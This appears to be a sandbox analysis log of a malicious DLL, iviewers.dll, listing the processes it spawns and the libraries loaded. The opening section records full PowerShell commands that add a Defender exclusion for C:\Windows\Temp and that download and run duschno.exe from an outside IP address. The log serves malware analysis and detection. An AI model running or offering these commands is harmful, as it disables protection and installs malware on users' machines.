Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\5mg21dmq.1jt.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\ochicikt.z2z.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\t0ppkxxj.rwu.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\Temp\t0ppkxxj.rwu.exe "C:\Windows\Temp\t0ppkxxj.rwu.exe"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\Temp\ochicikt.z2z.exe "C:\Windows\Temp\ochicikt.z2z.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Temp\inyligbs.qlq.exe "C:\Windows\Temp\inyligbs.qlq.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Temp\5mg21dmq.1jt.exe "C:\Windows\Temp\5mg21dmq.1jt.exe"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\t0ppkxxj.rwu.exe'"	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\Temp\t0ppkxxj.rwu.exe "C:\Windows\Temp\t0ppkxxj.rwu.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\ochicikt.z2z.exe'"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\Temp\ochicikt.z2z.exe "C:\Windows\Temp\ochicikt.z2z.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Temp\inyligbs.qlq.exe "C:\Windows\Temp\inyligbs.qlq.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\5mg21dmq.1jt.exe'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Temp\5mg21dmq.1jt.exe "C:\Windows\Temp\5mg21dmq.1jt.exe"	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
